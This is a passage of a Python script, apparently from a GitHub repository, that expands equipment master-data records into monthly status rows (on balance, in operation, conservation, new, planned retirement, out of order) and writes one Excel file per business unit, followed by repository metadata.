"out":"План на вывод",
"in_operation":"Эксплуатация",
"out_of_order":"Неисправно"
}
for status_condition, status_condition_rus in status_condition_dict.items():
if status_condition == "on_balance":
if sap_system_status not in sap_system_status_ban_list:
time_operation_point_date = operation_start_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
while time_operation_point_date <= operation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['operation_status'] = "На балансе"
temp_dict['qty'] = 1
temp_dict['На балансе'] = 1
temp_dict['month_date'] = time_operation_point_date
result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
if status_condition == "in_operation":
if sap_user_status not in sap_user_status_cons_status_list and \
operation_status_from_file != "Консервация" and \
sap_system_status not in sap_system_status_ban_list:
# operation_start_date <= datetime.strptime('31.12.2023', '%d.%m.%Y') and \
# operation_finish_date >= datetime.strptime('1.1.2022', '%d.%m.%Y'):
time_operation_point_date = operation_start_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
# if eo_code == '100000065592':
while time_operation_point_date <= operation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['operation_status'] = "Эксплуатация"
temp_dict['qty'] = 1
temp_dict['Эксплуатация'] = 1
# print("time_operation_point_date: ", time_operation_point_date)
# print("eo_code: ", eo_code, "operation_start_date: ", operation_start_date, "operation_finish_date: ", operation_finish_date)
# print(time_operation_point)
# if time_operation_point_date >=datetime.strptime('1.1.2022', '%d.%m.%Y'): #and \
# time_operation_point_date <= datetime.strptime('31.12.2023', '%d.%m.%Y'):
# print(time_operation_point)
temp_dict['month_date'] = time_operation_point_date
age = (time_operation_point_date - operation_start_date).days / 365.25
temp_dict['age'] = age
temp_dict['diagram_eo_count_in_operation'] = eo_code
temp_dict['diagram_year'] = time_operation_point_date.year
# print("time_operation_point_date: ", time_operation_point_date)
# print("eo_code: ", eo_code, "operation_start_date: ", operation_start_date, "operation_finish_date: ", operation_finish_date)
# print(temp_dict)
# if repair_start_date == date_time_plug:
# result_data_list.append(temp_dict)
if repair_start_date == date_time_plug:
result_data_list.append(temp_dict)
elif repair_start_date != date_time_plug and time_operation_point_date < repair_start_date:
result_data_list.append(temp_dict)
elif repair_start_date != date_time_plug and time_operation_point_date > repair_finish_date:
result_data_list.append(temp_dict)
else:
if eo_code == '100000072785':
print(eo_code, "time_operation_point_date: ", time_operation_point_date, " repair_start_date: ", repair_start_date, " repair_finish_date:", repair_finish_date)
# and repair_start_date <= operation_finish_date and time_operation_point_date <= repair_start_date:
# result_data_list.append(temp_dict)
# elif repair_start_date != date_time_plug and repair_start_date <= operation_finish_date and time_operation_point_date >= repair_finish_date:
# result_data_list.append(temp_dict)
# result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
if status_condition == "conservation":
if (sap_user_status in sap_user_status_cons_status_list or \
operation_status_from_file == "Консервация") and \
sap_system_status not in sap_system_status_ban_list:
# operation_start_date <= datetime.strptime('31.12.2023', '%d.%m.%Y') and \
# operation_finish_date >= datetime.strptime('1.1.2022', '%d.%m.%Y'):
time_operation_point_date = conservation_start_date
conservation_finish_date = operation_finish_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
# if eo_code == '100000065592':
while time_operation_point_date <= conservation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['conservation_start_date'] = conservation_start_date
temp_dict['conservation_finish_date'] = conservation_finish_date
temp_dict['operation_status'] = "Консервация"
temp_dict['qty'] = 1
temp_dict['Консервация'] = 1
temp_dict['month_date'] = time_operation_point_date
result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
if status_condition == "new":
# проверяем чтобы ео не была в консервации и в удаленных
if sap_user_status not in sap_user_status_cons_status_list and \
sap_system_status not in sap_system_status_ban_list:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['month_date'] = operation_start_date_month
temp_dict['operation_status'] = "Ввод нового"
temp_dict['qty'] = 1
temp_dict['Ввод нового'] = 1
result_data_list.append(temp_dict)
elif status_condition == "out":
if sap_system_status not in sap_system_status_ban_list:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['month_date'] = operation_finish_date_month
temp_dict['operation_status'] = "План на вывод"
temp_dict['qty'] = -1
temp_dict['План на вывод'] = -1
result_data_list.append(temp_dict)
if status_condition == "out_of_order":
if sap_system_status not in sap_system_status_ban_list:
time_operation_point_date = operation_start_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
if repair_start_date != date_time_plug and repair_start_date <= operation_finish_date:
while time_operation_point_date <= operation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['operation_status'] = "Неисправен"
temp_dict['qty'] = 1
temp_dict['Неисправен'] = 1
temp_dict['month_date'] = time_operation_point_date
if time_operation_point_date >= repair_start_date and time_operation_point_date <= repair_finish_date:
result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
iter_df_temp = pd.DataFrame(result_data_list)
iter_df_temp['eo_count'] = iter_df_temp['eo_code']
# режем результат по началу 22-го года
iter_df_temp = iter_df_temp.loc[iter_df_temp['month_date']>=datetime.strptime('1.1.2022', '%d.%m.%Y')]
# iter_df_temp = iter_df_temp.rename(columns=master_data_to_ru_columns)
iter_df_temp.reset_index()
list_of_be = list(set(iter_df_temp['be_code']))
# list_of_be = [1100]
for be_code in list_of_be:
df = iter_df_temp.loc[iter_df_temp['be_code']==be_code]
# iter_df_temp["month_date"] = iter_df_temp["month_date"].dt.strftime("%d.%m.%Y")
wb = openpyxl.Workbook(write_only=True)
ws = wb.create_sheet("Sheet1")
i=0
print(be_code, ": ", len(df))
df = df.rename(columns=master_data_to_ru_columns)
for r in dataframe_to_rows(df, index=False, header=True):
i=i+1
# print(i, " из ", lenght)
ws.append(r)
wb.save(f"temp_data/df_{be_code}.xlsx")
# if eo_code == '100000061761':
# print(eo_code) | Zhenya1975/bdo_v41 | functions/read_be_eo_xlsx_file_v5.py | read_be_eo_xlsx_file_v5.py | py | 24,681 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "extensions.extensions.db",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "extensions.extensions",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 15,
"usage_type": "call"
},
{
"ap... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.